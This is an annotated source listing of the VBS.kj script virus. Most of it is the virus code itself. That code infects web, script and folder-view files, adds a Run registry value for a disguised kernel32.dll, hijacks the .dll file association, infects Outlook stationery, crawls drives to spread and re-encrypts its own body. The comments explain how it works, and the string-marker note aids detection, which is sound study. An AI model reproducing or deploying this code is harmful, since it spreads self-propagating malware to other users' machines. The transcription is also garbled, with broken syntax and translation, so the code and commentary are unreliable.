VBS.kj [New Joy Time] - Source Code Analysis (Virus: Vbs.kj)
' Analysis by
' Dancefire (dancefire@263.net)
' 2002/7/10
'
Dim Inwhere, HtmlText, VBSText, Degreesign, AppleObject, Fso, Wsshell, WinPath, Sube, FinalyDisk
SUB KJ_START ()
' Entry point of the virus body, invoked from an infected HTML/HTT page
' (via the Body onload written by Kjappendto) or from a .vbs host. The order
' matters: Kjsetdim decides whether the host is "html" or "VBS" (Inwhere),
' and the later routines use that flag to skip steps that do not apply.
' Detection note: the literal "KJ_Start ()" is also the marker Kjappendto
' checks to avoid re-infecting a file, so it doubles as a string signature
' for finding infected HTML, HTT and VBS files.
' Initialize variables and objects (Fso, WSShell, Inwhere, WinPath, ...)
Kjsetdim ()
' Set up the system environment (startup file, registry Run value, file associations)
Kjcreatemilieu ()
' When running from an HTML page, infect the directory of a local or shared document
Kjlikeit ()
' Infect the Outlook Express / Outlook stationery (mail templates)
Kjcreatemail ()
' Propagate: walk further directories and infect them
KJPROPAGATE ()
End Sub
'Function: Kjappendto (FilePath, TypeStr)
'Purpose: append the virus body to the specified file, in the form selected by TypeStr
'Parameters:
'FilePath - path of the file to infect
'TypeStr - the file type, which selects how the body is added
Function Kjappendto (FilePath, TypeStr)
' Appends the virus body to an existing file; the form depends on TypeStr
' ("htt", "HTML" or "vbs" as written below). The string compares are exact,
' and the case used by callers elsewhere in this listing (e.g. "HTT", "html")
' does not always match these literals — NOTE(review): treat the exact
' casing in this transcription as unreliable.
' Error handling is switched off for the whole routine (reads as
' On Error Resume Next; transcribed as "ResMe"), so unreadable or locked
' files are skipped silently rather than reported.
ON Error ResMe next
'Open the specified file in read-only mode (OpenTextFile mode 1 = ForReading)
Set readTemp = fso.opentextfile (FilePath, 1)
'Read the whole file into TMPSTR
TMPSTR = ReadTemp.Readall
'Re-infection guard: skip the file if it already contains the marker
'"KJ_Start ()" or if it is empty.
IF INSTR (TMPSTR, "KJ_Start ()") <> 0 or Len (Tmpstr) <1 THEN
ReadTemp.close
EXIT FUNCTION
END IF
'"htt": the file is rewritten (mode 2 = ForWriting) with a Body onload
'   that calls KJ_Start () placed in front of the original content, and the
'   HTML form of the body (HtmlText) after it; the file is then marked
'   Hidden + Archive (attribute value 34).
'"HTML": a new <HTML><Body onload=...> block plus HtmlText is appended
'   (mode 8 = ForAppending) after the original content.
'"vbs": the VBS form of the body (VBSText) is appended.
If TypeStr = "htt" then
ReadTemp.close
Set filetemp = fso.opentextfile (FilePath, 2)
FileTemp.write "<" & "Body οnlοad =" "&" VBScript: "&" KJ_Start () "" & "&" & vbcrf & tmpstr & vbcrlf & HtmlText
FileTemp.close
SET FATTRIB = fso.getfile (FilePath)
'34 = Hidden (2) + Archive (32) in the FileSystemObject attribute flags
FATTRIB.ATRIBUTES = 34
Else
ReadTemp.close
SET fileTemp = fso.opentextfile (FilePath, 8)
If TypeStr = "HTML" THEN
'NOTE(review): this Write and the following ElseIf branch are run together
'on one line in this transcription.
FileTemp.Write VBCRLF & "<" & "HTML>" & VBCRLF & "<" & "Body οnlοad =" "" "" "" "" "&" & vbcrlf & htmltextelseif typeStr = "vbs" then
FileTemp.write VBCRLF & VBSText
END IF
FileTemp.close
END IF
END FUNCTION
'Function: kjchangesub (currentstring, lastindexchar)
'Purpose: move to the parent directory, or switch to another drive letter
'Parameters:
'currentstring - the current directory path
'lastindexchar - position of the last path separator in the current path
Function kjchangesub (currentstring, lastindexchar)
'Judgment is the root directory
If LastIndexchar = 0 THEN
'If it's root directory
'If it is C: /, return to the FinalyDisk disk, and set the SUBE to 0,
'If not C: /, return to decrement the current drive 1, and set the SUBE to 0
IF Left (Currenstring), 1) = KJChangeSub = FinalyDisk & ": /" Sube = 0 Else Kjchangesub = CHR (ASC (LEFT (LEFT (LEFT (LEFT (LCASTRING), 1)) - 1) & ": /" Sube = 0 END IF Else 'If it is not an root directory, return to the previous directory name Kjchangesub = MID (Currentstring, 1, LastIndexcha) END IF END FUNCTION 'Function: kjcreatemail () 'Features: Infective Mail Section Function kjcreatemail () ON Error ResMe next 'If the current execution file is "html", you will exit the function. IF inwhere = "html" then EXIT FUNCTION END IF 'Take the path to the blank page of the system disk ShareFile = Left (WinPath, 3) & "Program Files / Common Files / Microsoft Shared / Stationery / Blank.htm" 'If this file is present, you will add HTML virions to it. 'Otherwise, this file containing a viral body IF (fso.fileexists (shadefile). Call Kjappendto (Sharefile, "HTML") Else SET fileTemp = fso.opentextfile (Sharefile, 2, True) FileTemp.write "<" & "HTML>" & VBCRLF & "<" & "Body οnlοad =" "" VBScript: "&" KJ_Start () "" & "&" & vbcrlf & HtmlTextFileTemp.close END IF 'Take the current user ID and Outlook version DefaultId = WSShell.regread ("HKEY_CURRENT_USER / IDENTIN / Default User ID") OutlookVersion = WSShell.regread ("HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Outlook Express / Mediaver") 'Activation of letter paper function, and infect all letter paper WSShell.Regwrite "HKEY_CURRENT_USER / IDENTIES /" & DEFAULTID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Compose Usenessry", 1, "Reg_dword" Call Kjmailreg ("HKEY_CURRENT_USER / IDentities /" & DefaultID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Stationery Name", ShareFile Call Kjmailreg ("HKEY_CURRENT_USER / IDENTIES /" & DEFAULTID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 
0 / Mail / Wide Stationery", ShareFile WSShell.Regwrite "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Outlook / Options / Mail / EditorPreference", 131072, "REG_DWORD" Call Kjmailreg ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0A0D02000000000000000000000046 / 001E0360", "Blank") Call KJMailReg ( "HKEY_CURRENT_USER / Software / Microsoft / Windows NT / CurrentVersion / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0a0d020000000000c000000000000046 / 001e0360", "blank") WsShell.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / Office / 10.0 / Outlook / Options / Mail / EditorPreference", 131072, "REG_DWORD" Call KJMailReg ( "HKEY_CURRENT_USER / Software / Microsoft / Office / 10.0 / Common / MailSettings / NewStationery", " Blank ") KjummageFolder (Left (WinPath, 3) & "Program Files / Common Files / Microsoft Shared / Stationery") END FUNCTION 'Function: kjcreatemilieu () 'Features: Create a system environment Function kjcreatemilieu () ON Error ResMe next Temppath = "" " 'Judging the operating system is NT / 2000 or 9X IF not (fso.fileexists (WinPath & "Wscript.exe)). Temppath = "system32 /" END IF 'It is confusing for the file name and does not conflict with the system file. 
'If it is NT / 2000, the file is started for system / kernel32.dll 'If you are 9X boot files for system / kernel.dll If Temppath = "System32 /" THEN Startupfile = WinPath & "System / kernel32.dll" Else Startupfile = WinPath & "System / kernel.dll" END IF 'Add a RUN value, add the startup file path you just generated WSShell.Regwrite "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / Kernel32", StartupFile 'Copying the previous backup file to the original directory Fso.copyfile WinPath & "Web / Kjwall.gif", WinPath & "Web / Folder.htt" Fso.copyfile WinPath & "System32 / KJWALL.GIF", WinPath & "System32 / Desktop.ini" 'Additional viral body to% WINDIR% / Web / Folder.htt Call Kjappendto (WinPath & "Web / Folder.htt", "HTT") 'Change the MIME header of the DLL 'Change the default icon of the DLL 'Change the way of opening the DLL WSShell.Regwrite "HKEY_CLASS_ROOT / .DLL /", "DLLFILE" WSSHELL.REGWRITE "HKEY_CLASS_ROOT / .DLL / Content Type", "Application / X-MSDownload" WsShell.RegWrite "HKEY_CLASSES_ROOT / dllfile / DefaultIcon /", WsShell.RegRead ( "HKEY_CLASSES_ROOT / vxdfile / DefaultIcon /") WsShell.RegWrite "HKEY_CLASSES_ROOT / dllfile / ScriptEngine /", "VBScript" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / shell / open / command /", WinPath & Temppath & "Wscript.exe" "% 1" "% *" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / Shellex / PropertySheetHandlers / Wshprops /", "{60254CA5-953B-11CF-8C96-00AA00B8708C}" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / SCRIPTHOSTENCODE /", "{85131631-480c-11d2-b1f9-00c04f86c324}" 'Write a virion body in the virus file loaded during startup Set filetemp = fso.opentextfile (Startupfile, 2, true) FileTemp.write VBSText FileTemp.close END FUNCTION 'Function: kjlikeit () 'Features: Treatment for HTML files, if access is local or shared file, you will infect this directory Function kjlikeit () 'If the current execution file is not "html", you will exit the program. 
IF inwhere <> "html" THEN EXIT FUNCTION END IF 'Get the current path of the document ThisLocation = Document.Location 'If it is a local or online sharing file IF Left (thisLocation, 4) = "file" then ThisLocation = MID (thisLocation, 9) 'If this file extension is not empty, save it in thisLocation If fso.getextensionName (thisLocation) <> "" ThisLocation = Left (thisLocation, Len (thisLocation) - len (fso.getfilename (thisLocation))) END IF 'If the length of thisLocation is greater than 3, you will chase a "/" IF Len (thisLocation)> 3 THEN ThisLocation = thisLocation & "/" END IF 'Infection this directory KjummageFolder (thisLocation) END IF END FUNCTION 'Function: kjmailreg (regstr, filename) 'Features: If the registry specifies the key value does not exist, write to the specified file name to the specified location. 'Parameters: 'Regstr registry specified key value 'Filename Specifies the file name Function Kjmailreg (Regstr, FileName) ON Error ResMe next 'If the registry specified key value does not exist, write to the specified file name to the specified location. 
Regtempstr = WSShell.Regread (RegSTR) If regtempstr = "" "" WSShell.Regwrite Regstr, FileName END IF END FUNCTION 'Function: kjobosub (currentstring) 'Features: Traverse and return to the directory path 'Parameters: 'Currentstring current catalog Function Kjobosub (Currentstring) Sube = 0 TESTOUT = 0 Do While True Testout = TESTOUT 1 IF Testout> 28 THEN Currentstring = FinalyDisk & ": /" Exit do END IF ON Error ResMe next 'Get all the subdireuses of the current directory and put it in the dictionary SET thisfolder = fso.getfolder (currentstring) SET DICSUB = CreateObject ("scripting.dictionary") SET Folders = thisfolder.subfolders Foldercount = 0 For Each TempFolder in Folders Foldercount = foldercount 1 DICSUB.Add Foldercount, TempFolder.name NEXT 'If there is no sub-directory, call kjchangesub to return to the previous directory or replace the drive letter, and set the SUBE 1 IF DICSUB.COUNT = 0 THEN LastIndexchar = Instrrev (currentstring, "/", len (currentstring) -1) Substring = MID (Currentstring, LastIndexchar 1, Len (Currentstring) -lastIndexchar-1) Currentstring = kjchangesub (currentstring, lastindexchar) Sube = 1 Else 'If there is a subdirectory 'If SUBE is 0, turn currentstring to its first sub-directory IF sube = 0 THEN Currentstring = Currentstring & DICSUB.Item (1) & "/" Exit do Else 'If SUBE is 1, continue in the middle of the life, and return the next subdirectory J = 0 For j = 1 to foldercount If LCASTRING = LCase (DICSUB.Item (j)) THEN IF j Currentstring = Currentstring & DICSUB.Item (J 1) & "/" Exit do END IFEND IF NEXT LastIndexchar = Instrrev (currentstring, "/", len (currentstring) -1) Substring = MID (Currentstring, LastIndexchar 1, Len (Currentstring) -lastIndexchar-1) Currentstring = kjchangesub (currentstring, lastindexchar) END IF END IF Loop Kjobosub = currentstring END FUNCTION 'Function: kjpropagate () 'Features: Viral communication Function kjpropagate () ON Error ResMe next Regpathvalue = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / 
Outlook Express / Degree" DiskdeGree = WSShell.Regread (RegPathValue) 'If there is no Degree this key value, DiskdeGree is a FinalyDisk disk. If diskdegree = "" "" Diskdegree = FinalyDisk & ": /" END IF 'Close DiskdeGree after infection 5 directory FOR i = 1 to 5 Diskdegree = kjobosub (DiskdeGree) KjummageFolder (Diskdegree) NEXT 'Save the infection record in the "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Outlook Express / Degree" key value WSShell.Regwrite RegpathValue, Diskdegree END FUNCTION 'Function: kjummagefolder (pathname) 'Features: Infection Specified Directory 'Parameters: 'PathName Specify Directory Function KjummageFolder (Pathname) ON Error ResMe next 'All files set in the directory Set foldername = fso.getfolder (Pathname) SET thisfiles = foldername.files HTTEXISTS = 0 For Each thisfile in thisfiles FILEEXT = ucase (fso.getextensionName (thisfile.path)) 'Judging the extension 'If HTM, HTML, ASP, PHP, JSP add HTML version of viral body to the file 'If VBS is added to the file, you will add VBS version of viral body. 'If it is htt, the flag is already HTT. If FileExt = "HTM" OR FileExt = "HTML" OR FileExt = "ASP" OR FileExt = "PHP" OR FileExt = "JSP" THEN Call kjappendto (thisfile.path, "html") Elseif FileExt = "VBS" THEN Call kjappendto (thisfile.path, "vbs") elseif fileext = "htt" then Httexists = 1 END IF NEXT 'If the path is the desktop, the logo is already HTT. 
IF (ucase (pathname) = ucase (WinPath & "Desktop /")) or (ucase (pathname) = ucase (WinPath & "Desktop")) Httexists = 1 END IF 'If there is no HTT 'Additional viral body to the catalog IF httexists = 0 THEN Fso.copyfile WinPath & "System32 / Desktop.ini", Pathname Fso.copyfile WinPath & "Web / Folder.htt", Pathname END IF END FUNCTION 'Function kjsetdim () 'Define FSO, WSSHELL object 'Get the last available disk scroll 'Generate the encrypted string for infection 'WEB / FOLDER.HTT and System32 / Desktop.ini in the backup system Function kjsetdim () ON Error ResMe next Err.clear 'Test the current execution file is HTML or VBS Testit = wscript.scriptfullname IF Err THEN Inwhere = "html" Else Inwhere = "VBS" END IF 'Creating a file access object and shell object IF inwhere = "vbs" then SET FSO = CreateObject ("scripting.filesystemObject") SET WSSHELL = CreateObject ("wscript.shell") Else Set AppleObject = Document.Applets ("kj_guest") AppleObject.setClsid ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance () SET WSSHELL = AppleObject.getObject () AppleObject.SetClsid ("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject.createInstance () SET FSO = AppleObject.getObject () END IF Set diskObject = fso.drives 'Judgment disk type ' '0: unknown '1: Removable '2: fixed '3: NetWork '4: CD-ROM '5: Ram Disk 'If you are not a movable disk or a fixed disk, you jump out of the loop. Pust may consider the network disk, CD-ROM, RAM Disk is a relatively releared position. Oh, if C: Is Ramdisk? For Each DiskTemp in DiskObject If DiskTemp.DriveType <> 2 and disktemp.driveType <> 1 THENEXIT for END IF FinalyDisk = Disktemp.driveletter NEXT 'The previous virion has been decrypted and stored in thistext. Now in order to spread, it needs to be encrypted again. 
' Encryption Algorithm Dim Otherarr (3) Randomize 'Randomly generate 4 operators For i = 0 TO 3 Otherarr (i) = int ((9 * rND)) NEXT Tempstring = "" For i = 1 to Len (thistext) Tempnum = ASC (MID (thistext, i, 1)) 'Do special treatment for the Enter, Putting (0x0D, 0x0A) IF Tempnum = 13 THEN Tempnum = 28 Elseif Tempnum = 10 THEN TEMPNUM = 29 END IF 'Simple encryption processing, each character minus the corresponding operator, then when decrypt, just follow the corresponding operators in this order. Tempchar = CHR (Tempnum - Otherarr (i mod 4)) IF Tempchar = CHR (34) THEN Tempchar = CHR (18) END IF Tempstring = Tempstring & Tempchan NEXT 'Strings containing decryption algorithm Unlockstr = "Execute (" "Dim Keyarr (3), thistext" "& vbcrf &" Keyarr (0) = "& Otherarr (0) &" & vbcrlf & "Keyarr (1) =" & OtheRR (1) & " "& vbrlf &" "Keyarr (2) =" & Otherarr (2) & "" & vbcrf & "" Keyarr (3) = "& OtheRR (3) &" "" & vbcrf & "for i = 1 to Len (Exestring) "& Vbcrf &" "Tempnum = ASC (MID (ExestRing, I, 1))" "& vbcrf &" "& vbrlf &" "& vbcrf &" "Tempnum = 34" "& VBCRLF &" "Endix" & vbcrlf & "tempchar = CHR (Tempnum Keyarr (I Mod 4)) "" & VBCRLF & "" "& vbrlf &" "" & vbrlf & "" Tempchar = VBCR "" & Vbcrf & "" Elseif Tempchar = CHR (29) THEN "& VBCRLF &" Tempchar = VBLF "& VBCRLF &" "Endiff" "& VBCRLF &" "& Vbrlf &" "& vbcrf &" "" & vbcrf & "EXECUTE (THISTEXT)" Copy the encrypted virus to the variable THistext Thistext = "exasting =" "& tempstring &" "" " 'Script of HTML infection HtmlText = "<" & "Script language = VBScript>" & VBCRLF & "Document.write" & "" & "&" & "" "&" Div Style = 'Position: absolute; left: 0px; Top: 0px; width: 0px; height: 0px; z-index: 28; Visibility: hidden '> "&" <"" "" "" "_ guest height = 0 width = 0 code = com.ms "" & "" Activex.active "" & "" XComponent> "&" <"&" / applet> "&" & "&" / div> "" & vbcrf & "<" / script> "& VBCRLF &" <"& VBCRLF &" & VBScript> "& VBCRLF & THISTEXT & VBCRLF & Unlockstr & VBCRLF &" & "&" / Script> & vbcrlf & "<" & "/ Body> & 
Vbcrf &" "<" & "/ Html>" to generate scripts for VBS infection VBSText = THISTEXT & VBCRLF & Unlockstr & Vbcrlf & "KJ_Start ()" 'Get a Windows directory 'GetSpecialFolder (N) '0: WindowsFolder '1: SystemFolder '2: TemporateFolder 'If the system directory exists on Web / Folder.htt and System32 / Desktop.ini, use the KJWALL.GIF file name backup them. WinPath = fso.getspecialfolder (0) & "/" IF (Fso.fileexists (WinPath & "Web / Folder.htt")). Fso.copyfile WinPath & "Web / Folder.htt", WinPath & "Web / KJWALL.GIF" END IF IF (Fso.fileexists (WinPath & "System32 / Desktop.ini")). Fso.copyfile WinPath & "System32 / Desktop.ini", WinPath & "System32 / KJWALL.GIF" END IF